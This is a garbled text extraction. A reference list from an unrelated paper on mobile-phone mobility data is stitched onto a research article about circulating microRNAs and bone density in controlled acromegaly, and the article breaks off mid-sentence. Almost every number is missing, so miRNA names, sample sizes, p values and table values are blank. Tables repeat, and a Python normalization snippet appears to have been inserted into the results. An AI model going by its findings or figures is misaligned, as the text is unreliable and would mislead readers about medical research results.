calabrese f, diao m, lorenzo gd, ferreira j, ratti c. understanding individual mobility patterns from urban sensing data: a mobile phone trace example. transportation research part c: emerging technologies.
chen cp, zhang c-y. data-intensive applications, challenges, techniques and technologies: a survey on big data. information sciences.
chung frk. spectral graph theory. cbms regional conference series in mathematics. rhode island: american mathematical society.
coifman rr, lafon s. diffusion maps. applied and computational harmonic analysis.
dobra a, williams ne, eagle n. spatiotemporal detection of unusual human population behavior using mobile phone data. plos one.
dong x, ortega a, frossard p, vandergheynst p. inference of mobility patterns via spectral graph wavelets. in: ieee international conference on acoustics, speech and signal processing.
folke c. resilience: the emergence of a perspective for social-ecological systems analyses. global environmental change.
gelbaum z, titus m, watson j. multi-scale analysis on complex networks using hermitian graph wavelets. available at http://arxiv.org/abs/ .
giannotti f, nanni m, pedreschi d, pinelli f, renso c, rinzivillo s, trasarti r. unveiling the complexity of human mobility by querying and mining massive trajectory data. international journal on very large data bases.
hammond dk, vandergheynst p, gribonval r. wavelets on graphs via spectral graph theory. applied and computational harmonic analysis.
iqbal ms, choudhury cf, wang p, gonzalez mc. development of origin-destination matrices using mobile phone call data. transportation research part c: emerging technologies.
jarv o, ahas r, witlox f. understanding monthly variability in human activity spaces: a twelve-month study using mobile phone call detail records. transportation research part c: emerging technologies.
jiang s, ferreira j, gonzalez mc. activity-based human mobility patterns inferred from mobile phone data: a case study of singapore. ieee transactions on big data.
lambiotte r, blondel vd, de kerchove c, huens e, prieur c, smoreda z, dooren pv. geographical dispersal of mobile communication networks. physica a: statistical mechanics and its applications.
lee j-g, kang m. geospatial big data: challenges and opportunities. big data research.
levin sa. ecosystems and the biosphere as complex adaptive systems. ecosystems.
lu x, bengtsson l, holme p. predictability of population displacement after the haiti earthquake. proceedings of the national academy of sciences of the united states of america.
lu x, wrathall dj, sundsøy pr, nadiruzzaman m, wetter e, iqbal a, qureshi t, tatem a, canright g, engaz-monsen k, bengtsson l. unveiling hidden migration and mobility patterns in climate stressed regions: a longitudinal study of six million anonymous mobile phone users in bangladesh. global environmental change.
mohan dm, asif mt, mitrovic n, dauwels j, jaillet p. wavelets on graphs with application to transportation networks. in: international ieee conference on intelligent transportation systems (itsc).
phithakkitnukoon s, smoreda z, olivier p. socio-geography of human mobility: a study using longitudinal mobile phone data. plos one.
scheffer m, bascompte j, brock wa, brovkin v, carpenter sr, dakos v, held h, van nes eh, rietkerk m, sugihara g. early-warning signals for critical transitions. nature.
scheffer m, bolhuis je, borsboom d, buchman tg, gijzel smw, goulson d, kammenga je, kemp b, van de leemput ia, levin s, martin cm, melis rjf, van nes eh, romero lm, olde rikkert mgm. quantifying resilience of humans and other animals. proceedings of the national academy of sciences of the united states of america.
shen c, vogelstein jt, priebe ce. manifold matching using shortest-path distance and joint neighborhood selection. pattern recognition letters.
simini f, gonzalez mc, maritan a, barabasi a-l. a universal model for mobility and migration patterns. nature.
song c, koren t, wang p, barabasi a-l. modelling the scaling properties of human mobility. nature physics.
song c, qu z, blumm n, barabasi a-l. limits of predictability in human mobility. science.
tremblay n, borgnat p. multiscale community mining in networks using spectral graph wavelets. in: european signal processing conference (eusipco).
wesolowski a, buckee co, bengtsson l, wetter e, lu x, tatem aj. commentary: containing the ebola outbreak - the potential and challenge of mobile network data. plos currents.
wesolowski a, stresman g, eagle n, stevenson j, owaga c, marube e, bousema t, drakeley c, cox j, buckee co. quantifying travel behavior for infectious disease research: a comparison of data from surveys and mobile phones. scientific reports.
widhalm p, yang y, ulm m, athavale s, gonzalez mc. discovering urban activity patterns in cell phone data. transportation.
xie m, neal j, burke m, lobell d, ermon s. transfer learning from deep features for remote sensing and poverty mapping. available at http://arxiv.org/abs/ .
circulating mir- a- p and mir- - p are associated with bone parameters in patients with controlled acromegaly

elena valassi, natalia garcía-giralt, jorge malouf, iris crespo, jaume llauger, adolfo díez-pérez and susan m webb

endocrinology/medicine department, hospital sant pau, centro de investigación biomédica en red de enfermedades raras (ciberer, unidad ), iib-sant pau, isciii and universitat autònoma de barcelona (uab), barcelona, spain; urfoa, imim (institut hospital del mar d'investigacions mèdiques), universitat autònoma de barcelona, barcelona, spain; mineral metabolism unit, medicine department, hospital sant pau, barcelona, spain; radiology department, hospital sant pau, barcelona, spain

correspondence should be addressed to e valassi: evalassi@santpau.cat

abstract

background: biochemical control of gh/igf-i excess in acromegaly (acro) is associated with persistent impairment of trabecular microstructure leading to increased risk of vertebral fractures. circulating mirnas modulate the activity of osteoblasts and osteoclasts, and may be potential biomarkers of osteoporosis.

aims: to identify differentially expressed mirnas in the serum of patients with controlled acro vs controls and to correlate mirna levels with both biochemical and structural bone parameters.

patients and methods: twenty-seven patients with controlled acro ( males, females; mean age, ± years; bmi, ± kg/m²) and age-, gender- and bmi-matched controls were recruited. areal bmd at lumbar spine and femur, and trabecular bone score, were assessed; volumetric bmd was measured by quantitative computed tomography (qct-pro, mindways). twenty mirnas, chosen by their putative role in bone, were quantified in serum using real-time qpcr.

results: in acro patients, mir- a- p and mir- - p were found overexpressed, whereas mir- - p was underexpressed (p < . ). mir- a- p levels were negatively associated with both trabecular vbmd at the trochanter and serum osteoprotegerin concentrations (p < . ) and positively with vitamin d concentrations (p < . ) and total cross-sectional area of the femoral neck (p < . ). mir- - p levels were correlated with both trabecular vbmd at the trochanter and opg concentrations (p < . ), but were negatively associated with vitamin d levels (p < . ). a negative correlation between mir- a- p and mir- - p was found in both groups (p < . ).

conclusions: circulating mir- a- p and mir- - p are differentially expressed in controlled acro patients and associated with bone structural parameters. mirnas may be one of the mechanisms involved in the pathogenesis of bone disease and could be used as biomarkers in acro patients.

keywords: acromegaly; micrornas; volumetric bone mineral density

endocrine connections
introduction

growth hormone (gh) and insulin-like growth factor-i (igf-i) are anabolic hormones which influence bone metabolism through the modulation of several signaling pathways ( ). in vitro studies showed that gh enhances the proliferation and differentiation of osteoblastic cell lines, driving the commitment of the mesenchymal stem cell (msc) to osteoblastogenesis ( , , ). on the other hand, igf-i enhances the function of mature osteoblasts and maintains appropriate levels of bone matrix and bone mass ( ).

acromegaly (acro) is a rare disease caused by excessive gh production from a pituitary adenoma ( ). chronic elevation of gh and igf-i in acro is associated with severe cardiovascular, respiratory and metabolic complications, which lead to an average -year reduction of life expectancy and a doubled standardized mortality rate as compared with the general population ( ). bone abnormalities are also a frequent manifestation of acro due to the deleterious effects of gh excess on bone remodeling and calcium homeostasis ( ). acro patients show increased bone turnover and deterioration of both biomechanical competence and microarchitecture at the trabecular compartment ( , , ). of note, the latter has been associated with an increased prevalence of vertebral fractures even in controlled patients, in the presence of normal lumbar areal bone mineral density (abmd) ( ). cortical bone also appears to be impaired, in that a decrease in both bone material strength index (a marker of cortical bone properties), as assessed using microindentation, and femoral cortical volumetric bone mineral density (vbmd) has been described in acro patients despite biochemical control of the disease ( , ).

mirnas are single-strand, non-coding rnas that span between and nucleotide bases ( ). these molecules are involved in the modulation of a wide variety of biological processes, including bone cell formation, bone remodeling, bone homeostasis and skeletal development ( ). in particular, subsets of mirnas influence the commitment and differentiation of the msc into the osteogenic lineage by regulating several molecular pathways ( ). indeed, the deregulation of mirna-mediated mechanisms has been described as an important pathogenic factor for bone degeneration and skeletal disease ( ). interestingly, mirnas also circulate in serum as extracellular nuclease-resistant entities carried by a variety of carriers, such as exosomes, apoptotic bodies and vesicle-free lipoproteins ( ). as a result, mirnas have been advocated as promising biomarkers to predict the onset and progression of chronic diseases, including osteoporosis ( ). different levels of circulating mirnas ('signatures') have been found in patients with both idiopathic ( ) and postmenopausal osteoporosis ( , , , ) and have been indicated as reliable predictors of fragility fractures in postmenopausal women with and without type diabetes ( , , , , , ). belaya et al. recently analyzed bone samples from patients with active acro and found significant changes in the expression of several mirnas involved in osteoblastogenesis ( ). however, whether some circulating mirnas are associated with bone abnormalities in acro and, therefore, could represent useful markers to predict persistent bone impairment in these patients is still to be determined.
thus, our cross-sectional study was aimed at evaluating whether there are differentially expressed mirnas in the serum of patients with controlled acro as compared with sex-, age- and bmi-matched healthy controls. in addition, we examined whether these differentially expressed mirnas are related to bone parameters in our patients, including bone turnover markers, vbmd at spine and femur, and trabecular bone score (tbs), a tool designed to evaluate trabecular bone quality from the lumbar spine dxa image.

subjects and methods

subjects

we studied patients ( females and males) with controlled acro who had been recruited successively while attending our clinic. eighteen of these patients ( %) had been evaluated in previous studies from our center ( , ). controlled acro was defined as igf-i concentrations within the specific age-adjusted reference range; in those patients who were not on a gh receptor antagonist, random gh concentrations were lower than ng/ml. when the g oral glucose load test was performed, a gh value equal to or lower than . ng/ml was considered suggestive of cured disease ( ). all had a gh-secreting pituitary tumor confirmed pathologically. five patients were on pharmacological treatment: three on somatostatin analogs (ssa) and the other two on combination therapy with an ssa and either cabergoline or pegvisomant. all patients had transsphenoidal surgery from months to years (median: years) prior to inclusion in the study, and seven of them also received radiotherapy from to years (median: years) after unsuccessful surgery. three patients had secondary adrenal insufficiency, and all of them were on a stable replacement dose of hydrocortisone. five patients had secondary hypothyroidism and were on stable replacement therapy with levothyroxine at the time of the study. four males had secondary hypogonadism; because all of them had been on stable testosterone replacement for more than one year, they were considered eugonadal. nine women had regular menses and seven were postmenopausal. none of the patients had gh deficiency, diagnosed when igf-i levels were below two standard deviations of the age- and sex-adjusted normal range in a patient with at least three other documented hormone deficiencies or with a peak plasma gh of less than μg/l during an insulin tolerance test (itt) ( ). mean (±s.d.) duration of disease was ± months and was estimated as the time elapsed between the onset of symptoms and signs of acro (evaluated through old photographs and clinical history) and the time when treatment was proven to be effective. mean (±s.d.) duration of control was ± months and was calculated as the time between hormone normalization and study entry.

twenty-seven age-, gender- and bmi-matched controls were also studied, recruited through advertisements at the blood donor center of our hospital. control subjects who reported fragility fractures or who had morphometric vertebral fractures of any grade were excluded from the study. a fragility fracture was defined as any low-energy fracture, excluding those of the hands, feet and skull.
patients and controls with malignancies, inflammatory disorders, or kidney or liver dysfunction were also excluded from the study. consent was obtained from each patient or subject after full explanation of the purpose and nature of all procedures used. this study was approved by the ethical committee of our institution (ceic-iib santpau).

biochemical measurements

serum igf-i concentrations were measured by an enzyme immunoassay (mediagnost, reutlingen, germany) with a sensitivity of . ng/ml. the intra- and inter-assay coefficients of variation (cvs) were . and . %, respectively. in the study, igf-i is expressed as an sd score (sds). growth hormone (gh), osteocalcin, carboxy-terminal collagen crosslinks (ctx) and total procollagen type amino-terminal propeptide (p np) were measured by electrochemiluminescent immunoassay (cobas e ; roche diagnostics gmbh). imprecision for mean gh values between . and μg/l was – . %, for osteocalcin concentrations between . and μg/l was – . %, for β-crosslaps concentrations between . and . μg/l was . – . %, and for total p np values between . and μg/l was . – . %. sensitivity was . μg/l for gh, . μg/l for osteocalcin, . μg/l for ctx and μg/l for p np. serum -hydroxyvitamin d (vitamin d) concentrations were determined using an enzyme immunoassay (ids, boldon, uk), with a sensitivity of . ng/ml. imprecision for mean vitamin d values between and . ng/ml was . – . %. serum pth concentrations were measured by electrochemiluminescent immunoassay (cobas e ; roche diagnostics gmbh). imprecision for mean pth values between . and pg/ml was . – . %. serum osteoprotegerin (opg) concentrations were measured by an enzyme-linked immunosorbent assay (abcam), with a sensitivity of < pg/ml and a range between . and pg/ml. both serum dickkopf-related protein (dkk ) and sclerostin (sost) concentrations were measured using an enzyme immunoassay (biomedica, vienna, austria). both intra- and inter-assay cvs for dkk were %, and the sensitivity was . pmol/l. intra- and inter-assay cvs for sost were < and < %, respectively; sensitivity was . pmol/l. serum osteoprotegerin concentrations were measured using an enzyme-linked immunosorbent assay (biomedica); intra- and inter-assay cvs were < and < %, respectively, and sensitivity was . pmol/l.

radiological imaging

areal bmd (abmd) was measured by dual-energy x-ray absorptiometry scanning (hologic discovery dxa system, hologic, bedford, ma, usa). the cv was %. patients had the lumbar spine and femoral neck scanned. scan acquisition and analysis were performed by a certified and experienced technician according to the iscd standards (http://www.iscd.org/documents/ / / -iscd-adult-official-positions.pdf). trabecular bone score was acquired from the lumbar spine dxa image automatically by the tbs insight software (medimaps group sa, geneva, switzerland).
quantitative computed tomography (qct) was performed using a philips brilliance scanner. participants were positioned supine on the scanner table, lying on top of a solid calibration phantom which covered levels l –l (mindways software, inc., austin, tx, usa). spine volumetric bmd was calculated as the mean of the values at l , l and l (expressed as ls vbmd). to measure femoral vbmd, all scans were acquired from the acetabulum directly above the femoral head down to cm below the lesser trochanter, resulting in – slices, with mm slice thickness, over a range of – cm. all scans were performed at kv and to mas depending on the height and weight of the patient, according to the mindways technical specifications. the images were processed and analyzed using qct-pro software version . . and the qct-pro bone investigational toolkit version . (bit, mindways software, inc.) by the same physician (jm). volumetric bmd was obtained from the hip qct analysis by performing the following automated steps: (a) extraction of the proximal femur and (b) rotation and segmentation of bone voxels from soft tissue in three planes (axial, sagittal and coronal). for each scan at each time point, a fixed threshold ( mg/cm³) was used to discriminate the cortical from the trabecular compartment ( ). mechanical properties were obtained using the bit software. a sliced narrow neck (nn) analysis was performed, and the mechanical properties (buckling ratio (br), cross-sectional area (csa; cm²) and average cortical thickness (act, cm)) were taken as the mean value of the nn series results. nn consists of nine slices of the femoral neck; the average of the slice structural results was used to perform the analysis.

mirna isolation from serum samples

rna extraction was conducted at exiqon services, denmark. serum samples were centrifuged at g for min at °c. an aliquot of μl per sample was transferred to a fluidx tube, and μl of lysis solution bf containing μg carrier-rna per μl lysis solution bf and rna spike-in template mixture was added to the sample, mixed for min and incubated for min at room temperature, followed by the addition of μl protein precipitation solution bf. total rna was extracted from the samples using the mircury rna isolation kit – biofluids, high-throughput bead-based protocol v. (exiqon, vedbaek, denmark) in an automated -well format. the purified total rna was eluted in a final volume of μl and stored in a − °c freezer.

mirna selection

since very little information on mirnas in gh excess is available, the selection of mirnas to be measured in this study was based on previously published data evaluating the relationship between mirnas and bone phenotypes ( , , , ). mir- a- p, mir- a- p, mir- - p, mir- - p, mir- - p, mir- - - p, mir- - p, mir- - p and mir- b- p were selected based on a preliminary screening, which was performed in six patients and six controls using the mircury lna universal rt microrna pcr serum/plasma focus panel (exiqon) (supplementary table , see the section on supplementary data given at the end of this article). mir- a and mir- a- p were included for hemolysis assessment of samples.

microrna real-time qpcr

mirna qpcr and further data analyses were conducted at exiqon services, denmark. using the mircury lna universal rt microrna pcr polyadenylation and cdna synthesis kit (exiqon), μl rna was reverse transcribed in μl reactions.
then, cdna was diluted × and assayed in μl pcr reactions according to the protocol for mircury lna universal rt microrna pcr; each microrna was assayed once by qpcr on the microrna ready-to-use pcr custom pick and mix panel using exilent sybr green master mix. negative controls, excluding template from the reverse transcription reaction, were performed and profiled like the samples. the amplification was performed in a lightcycler real-time pcr system (roche) in -well plates. the amplification curves were analyzed using the roche lc software, both for determination of cq (by the 2nd derivative method) and for melting curve analysis. the amplification efficiency was calculated using algorithms similar to the linreg software. all assays were inspected for distinct melting curves, and the tm was checked to be within known specifications for the assay. furthermore, assays had to be detected with five cqs less than the negative control, and with cq < , to be included in the data analysis. data that did not pass these criteria were omitted from any further analysis. cq was calculated as the 2nd derivative. using normfinder, the best normalizer was found to be the average of assays detected in all samples; all data were therefore normalized to the average of assays detected in all samples (average-assay cq). data quality control, unsupervised data analysis and student's t-tests with benjamini–hochberg correction were performed (corrected p values < . were accepted as significant).

hemolysis assessment

microrna contamination from hemolysis ( ) was assessed using mir- (expressed in red blood cells) and a mirna relatively stable in serum, mir- a. the ratio between these two micrornas correlates with the degree of hemolysis; samples with ratios above . are considered affected by hemolysis.

statistical analysis

the data are expressed as mean ± s.d., except for data that were not normally distributed, in which case median values and ranges are reported. comparisons between two groups were performed using student's t (gaussian distribution) or mann–whitney's u (non-gaussian distribution) tests, depending on the data distribution. correlations were assessed using pearson's correlation coefficient or spearman's rank order, depending on whether the data were normally distributed. correlations were adjusted for age, sex, bmi and gonadal status by stepwise multiple linear regression analysis. tests were two-tailed, and a p < . was considered significant.

results

clinical characteristics and bone parameters

the characteristics of the study population are shown in table . volumetric bone mineral density at the lumbar spine (ls vbmd), as assessed by qct, was lower in acro patients as compared with healthy controls ( ± vs ± mg/cm³; p = . ). a reduction of cortical vbmd was also found in acro patients as compared with controls at the level of the total hip ( ± vs ± mg/cm³; p = . ), femoral neck ( ± vs ± mg/cm³; p = . ) and trochanter ( ( ) vs ( ) mg/cm³; p = . ). csa at the proximal femur was greater in acro than in controls ( . ± vs ± cm²; p = . ).
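the normalization and multiple-testing steps described in the statistical analysis above can be sketched in a few lines of code. this is illustrative only: the data layout, column names and libraries used here are our assumptions, not the study's actual pipeline (which was run at exiqon services).

```python
import pandas as pd
from scipy import stats
from statsmodels.stats.multitest import multipletests

def differential_expression(cq, is_acro):
    """cq: DataFrame of raw Cq values (rows = samples, columns = miRNAs);
    is_acro: boolean Series marking ACRO samples.  Each sample is normalized to
    the mean Cq of the assays detected in all samples (delta-Cq), groups are
    compared per miRNA with a t-test, and p values receive a Benjamini-Hochberg
    correction."""
    detected_in_all = cq.columns[cq.notna().all(axis=0)]
    # reference mean per sample minus Cq, so higher delta-Cq = more abundant
    dcq = cq.rsub(cq[detected_in_all].mean(axis=1), axis=0)
    rows = []
    for mirna in cq.columns:
        a = dcq.loc[is_acro, mirna].dropna()
        c = dcq.loc[~is_acro, mirna].dropna()
        _, p = stats.ttest_ind(a, c)
        rows.append({"mirna": mirna,
                     "log2_fold_change": a.mean() - c.mean(),  # delta-delta-Cq
                     "p_value": p})
    out = pd.DataFrame(rows)
    out["q_value"] = multipletests(out["p_value"], method="fdr_bh")[1]
    return out.sort_values("q_value")
```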
when postmenopausal women were excluded from the analysis, cortical vbmd at the total hip and trochanter was still reduced in acro patients as compared with their healthy, eugonadal counterparts (total hip, ± vs ± mg/cm³, p = . ; trochanter, ( ) vs ( ) mg/cm³, p = . ). when only postmenopausal women were compared, no differences in bone parameters were found. osteoprotegerin and dkk levels were significantly higher in acro as compared with controls ( . ± . vs . ± . pmol/l, p = . for osteoprotegerin; ± vs ± pmol/l, p = . for dkk ).

differentially expressed micrornas, acro vs controls

the hemolysis assessment of the samples showed no sign of red blood cell contamination. when comparing the acro group to the control group, the following mirnas were found to be differentially expressed: mir- a- p and mir- - p were overexpressed in acro patients, whereas mir- - p and mir- - p were underexpressed. mir- - p did not pass the benjamini–hochberg correction (table ).

relationship between serum mirnas and bone parameters

significant correlations between differentially expressed mirnas and bone parameters in acro patients are shown in table . mir- a- p levels were negatively associated with both trabecular vbmd at the trochanter (r − . , p = . ) and serum opg concentrations (r − . , p = . ). levels of mir- a- p were also positively associated with vitamin d concentrations (r . , p = . ) and total csa (spearman's rho . , p = . ). in contrast, levels of mir- - p were positively correlated with both trabecular vbmd at the trochanter (r . , p = . ) and opg concentrations (r . , p = . ), but were negatively associated with vitamin d levels (r − . , p = . ). levels of mir- - p were positively correlated with osteocalcin concentrations (r . , p = . ). in controls (table ), mir- a- p levels were positively associated with ctx concentrations (r . , p = . ) and tbs (r . , p = . ), and mir- - p levels were negatively associated with tbs (r − . , p = . ). levels of mir- - p were negatively associated with lumbar spine abmd (r − . , p = . ). no correlations were detected between mir- - p and bone parameters. mir- a- p was negatively associated with mir- - p in both acro patients (r − . , p < . ) and controls (r − . , p < . ). in controls only, mir- - p was negatively associated with mir- - p (r − . , p < . ). no correlations were found between any of the mirnas analyzed and the duration of either active or controlled disease.

table : general, biochemical and bone characteristics of patients with controlled acromegaly (acro) and healthy controls. columns: acro (n = ) | controls (n = ) | p value (student's t-test comparing patients with acromegaly vs healthy controls).
age (years): ± | ± | .
males/females: / | /
bmi (kg/m²): ± | ± | .
gh (µg/l): . ± . | . ± .
igf-i (ng/ml): ± | ± | .
igf-i sds: . ± . | ± . | .
bone markers
serum calcium (mg/dl): . ± . | ± . | .
(oh)d (ng/ml): ± | ± | .
serum pth (pg/ml): ± | ± | .
osteocalcin (ng/ml): ± | ± | .
total p np (ng/ml): ± | ± | .
ctx (ng/ml): . ± . | . ± . | .
osteoprotegerin (pmol/l): . ± . | . ± . | .
dkk (pmol/l): ± | ± | .
sost (pmol/l): ± | ± | .
dxa parameters
lumbar t-score: − . ± . | − . ± . | .
lumbar bmd: . ± . | . ± . | .
femur t-score: − . ± . | − . ± .
femoral neck abmd: . ± . | . ± . | .
total hip abmd: . ± . | . ± . | .
tbs: . ± . | . ± . | .
qct parameters
lumbar spine vbmd: ± | ± | .
total hip vbmd, trabecular: ± | ± | .
total hip vbmd, cortical: ± | ± | .
femoral neck vbmd, trabecular: ± | ± | .
femoral neck vbmd, cortical: ± | ± | .
trochanteric vbmd, trabecular: ± | ± | .
trochanteric vbmd, cortical: ( ) | ( ) | .
intertrochanteric vbmd, trabecular: ± | ± | .
intertrochanteric vbmd, cortical: ± | ± | .
biomechanical parameters
csa total: . ± | ± | .
act: . ± . | . ± . | .
br: . ± . | . ± .
notes: (oh)d, -hydroxyvitamin d; act (average cortical thickness), expressed in cm; bmi, body mass index; br, buckling ratio (unitless); csa, cross-sectional area, expressed in cm²; ctx, carboxy-terminal collagen crosslinks; dkk , dickkopf-related protein ; dxa, dual-energy x-ray absorptiometry; igf-i, insulin-like growth factor-i; p np, type amino-terminal propeptide; pth, parathyroid hormone; qct, quantitative computed tomography; sost, sclerostin; tbs, trabecular bone score; vbmd, volumetric bone mineral density, expressed in mg/cm³. variables are expressed as mean (±s.d.) or median (interquartile range) depending upon the distribution. statistically significant differences (p < . ) are marked in bold.

table : mirna expression levels in controlled acro patients and sex-, age- and bmi-matched controls. columns: acro | controls | fold change | p value | q value. values shown are those with a nominal p value < . , obtained using student's t-test on log-transformed normalized data; q values were calculated as estimates of the multiple-testing false-discovery rate (fdr), and bold values indicate the mirnas that passed the fdr threshold (q value < . ). rows (mirnas): hsa-mir- a- p, hsa-mir- - p, hsa-mir- - p, hsa-mir- - p, hsa-mir- a, hsa-mir- - p, hsa-mir- b- p, hsa-mir- a- p, hsa-mir- - p, hsa-mir- - p, hsa-mir- a- p, hsa-mir- - p, hsa-mir- - p, hsa-mir- - p, hsa-mir- - p, hsa-mir- b- p, hsa-mir- b- p, hsa-mir- - - p, hsa-mir- a- p, hsa-mir- - p. acro, acromegaly; mirna, microrna.

table : correlations between mirna expression and bone markers or bone parameters as assessed by dual-energy x-ray absorptiometry (dxa) and quantitative computed tomography (qct) in patients with acromegaly, after adjusting for age, sex, bmi and gonadal status. columns: hsa-mir- a- p | hsa-mir- - p | hsa-mir- - p.
(oh)d (ng/ml): r . ; p = . | r − . ; p = .
osteocalcin (ng/ml): r . ; p = .
ctx (ng/ml):
opg (pmol/l): r − . ; p = . | r . ; p = .
trochanteric trabecular vbmd: r − . ; p = . | r . ; p = .
total csa (cm²): ρ . ; p = .
abbreviations: (oh)d, -hydroxyvitamin d; csa, cross-sectional area; ctx, carboxy-terminal collagen crosslinks; opg, osteoprotegerin; p np, total procollagen type amino-terminal propeptide; tbs, trabecular bone score; vbmd, volumetric bone mineral density.

discussion

we have demonstrated that levels of circulating mir- a- p, mir- - p and mir- - p are differentially expressed in the serum of patients with controlled acromegaly (acro) as compared with age-, sex- and bmi-matched controls. moreover, we have found independent relationships between parameters of bone status and both mir- a- p and mir- - p levels that are exclusive to acro patients.

as a matter of fact, patients with active acro present with a disproportionate increase in bone turnover, especially resorption, reduced spine and femoral vbmd at both the trabecular and cortical compartments, altered trabecular microstructure and elevated fracture risk at the lumbar spine ( , , , ). after remission of the chronic gh/igf-i increase, patients with controlled acro maintain long-lasting impairment of trabecular microarchitecture, which is associated with persistently increased risk of vertebral fractures regardless of abmd ( , , ). interestingly, recent evidence suggests that the cortical compartment is also affected in acro patients with fragility vertebral fractures, even long after biochemical control ( , , , ). mechanisms underlying the detrimental effects of gh/igf-i excess on bone structure are multifactorial and still to be entirely elucidated ( ). the interaction of gh/igf-i with the rank-l/opg system may play a role in the regulation of bone metabolism. in particular, it has been suggested that igf-i may enhance osteoclastogenesis via stimulation of rank-l, whereas gh may attenuate this effect by inducing opg synthesis ( ). of note, we have found that opg levels are greater in controlled acro patients compared with those in
Of note, we have found that OPG levels are greater in controlled ACRO patients than in healthy subjects, as a possible compensatory mechanism which counteracts increased bone resorption.

Table : miRNA expression levels in controlled ACRO patients and sex-, age- and BMI-matched controls. For each hsa-miR, the table reports mean ± s.d. expression in ACRO and controls, fold change, p value and q value. Bold values indicate the miRNAs that passed the false-discovery rate (FDR) threshold for multiple comparisons (q value < . ). Values shown are those with a nominal p value < . , obtained using Student's t-test on log-transformed, normalized data; q values were calculated as estimates of the multiple-testing FDR. ACRO, acromegaly; miRNA, microRNA.

Table : Correlations between miRNA expression and bone markers or bone parameters as assessed by dual-energy X-ray absorptiometry (DXA) and quantitative computed tomography (QCT) in patients with acromegaly, after adjusting for age, sex, BMI and gonadal status. Rows report (OH)D, osteocalcin, CTX, OPG, trochanteric trabecular vBMD and total CSA against miR- a- p, miR- - p and miR- - p. (OH)D, hydroxyvitamin D; BMD, bone mineral density; CSA, cross-sectional area; CTX, carboxy-terminal collagen crosslinks; OPG, osteoprotegerin; P NP, total procollagen type amino-terminal propeptide; TBS, trabecular bone score; vBMD, volumetric bone mineral density.

Constantin et al. reported no change in the RANK-L/OPG ratio after surgical control of ACRO as compared with baseline, suggesting sustained perturbations of this system despite hormone normalization ( ). In our study, miR- a- p, upregulated in ACRO, was negatively associated with OPG and trabecular vBMD at the trochanter. It has recently been found that miR- a, which is expressed in both osteoblasts and osteoclasts of postmenopausal women, negatively regulates osteoblast differentiation and bone formation under mechanical loading by repressing the expression of RUNX , a key transcriptional factor for osteogenesis ( , ). Valenti et al.
described a runx overexpression in mscs during both the active and controlled phase of the disease, which was also associated with bone quality impairment, as assessed through histomorphometric analyses ( ). as a matter of fact, both runx deletion and overexpression led to impaired bone formation ( , ). however, belaya et al. reported unchanged expression of runx in bone samples of active acro patients, whereas no studies have been published thus far on controlled acro patients ( ). it could be speculated that, in controlled patients, mir- a participates in this complex network of signals modulating both osteoclastogenesis and osteoblastogenesis, also through the regulation of the rank-l/opg system. in contrast with mir- a- p, the mir- - p, downregulated in acro patients, positively correlated with both trabecular vbmd at trochanter and opg. as far as we know, there is no information about the mir- - p’s role in bone tissue, and the present study shows, for the first time, an association between this mirna and bone. mir- a- p and mir- - p appear to have an opposite relationship with parameters of bone metabolism, including vitamin d. while , (oh) d levels have been described as normal or high during the active phase of the disease, its levels, as well as those of (oh)d, did not change after control of gh/igf-i excess ( , , ). our results suggest that mir- a- p and mir- - p could be potential markers of bone status and could predict the persistence of bone abnormalities in controlled acro patients. noteworthy, these mirs were related to bone measurements even in healthy subjects. in particular, there was an opposite relationship between mir and tbs, while mir- a- p was positively associated with ctx, a marker of bone resorption. such findings strengthen the hypothesis that mir- a- p and mir- - p play a physiological role in regulating bone homeostasis and, therefore, may represent potential signatures for bone deterioration under pathological conditions like gh/igf-i excess. we have also found that mir- - p was upregulated in our patients. however, we did not detect any relationships between its levels and any of the bone parameters we measured. we are not aware of any putative role of this mirnas in bone regulation and, therefore, we hypothesize that this finding may be independent of skeletal health. as we previously described, dkk levels were higher in acro patients as compared with controls, but no relationship was found between this wnt signaling inhibitor and any of the mirnas analyzed ( ). limitations of our study include small sample size and relative heterogeneity of our population. in particular, % of patients were in pharmacological remission and % received radiotherapy. it is currently not known whether pharmacological treatment of acro may cause independent skeletal actions on bone or interfere with mirna expression ( ). nevertheless, none of the mirnas described here have been reported as differentially expressed in gh-secreting pituitary adenomas from patients who are responders vs nonresponders to somatostatin analogs ( ). ten of our patients had also undergone radiotherapy previously, but biermasz et  al. demonstrated that previous pituitary irradiation was not associated with alteration of lumbar spine bmd in acro table  correlations between mirna expression and bone markers or bone parameters (as assessed by dxa or qct) in healthy subjects after adjusting for sex, age, bmi and gonadal status. hsa-mir- a- p hsa-mir- - p hsa-mir- - p ctx (ng/ml) r . ; p =  . 
lumbar spine abmd r − . ; p =  . tbs r . ; p =  . r − . ; p =  . abmd, areal bone mineral density; bmd, bone mineral density; ctx, carboxy-terminal collagen crosslinks; opg, osteoprotegerin; sost, sclerostin; tbs, trabecular bone score; vbmd, volumetric bone mineral density. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly : patients in remission ( ). similarly, we could not assess the impact of comorbidities on mirna expression in our patients. another limitation of this study is its cross- sectional design, which prevents from inferring causality from our data. lack of information on vertebral fractures as well as lack of a group with active acromegaly are the other limitations of this study. since the source of the mirnas in serum is currently unknown, we cannot exclude that alterations of mirna expression may reflect specific actions in other tissues. mirnas are ubiquitous modulators controlling multiple patterns of gene expression and, therefore, may play a pathogenic role in several tissues and/or may be markers of more than one acro-related complication. indeed, acro is a multisystemic disease, which also seems to be associated with an elevated risk of malignancies ( ). it is intriguing to speculate that mir- a- p, mir- - p and mir- - p, which have been related to oncogenesis both in vitro and in vivo, may also be involved in the occurrence of tumors in acro patients ( , , , , , ). furthermore, associations of mirnas and bone parameters remained significant after adjusting for the gonadal status, suggesting that previous exposure to gh/ igf-i excess is the main determinant of bone impairment in patients with controlled acro, thus counteracting the negative effect of concomitant hypogonadism. indeed, madeira et  al. found deteriorated trabecular microarchitecture at both the distal radius and distal tibia, as assessed by high-resolution peripheral qct (hr-pqct), in eugonadal patients with controlled acro, as compared with their hypogonadal counterpart ( ). similarly, godang et  al. showed that tbs was reduced in acro eugonadal men after  year of hormone excess correction, but not in hypogonadal subjects ( ). moreover, another study reported no associations between the gonadal status of controlled acro patients and trabecular vbmd measurements across the proximal femur and also showed that controlled acro with normal gonadal function had lower vbmd at both total hip and intertrochanter as compared with controls ( ). in conclusion, we have described that some mirnas are differentially expressed in the serum of acro patients as compared 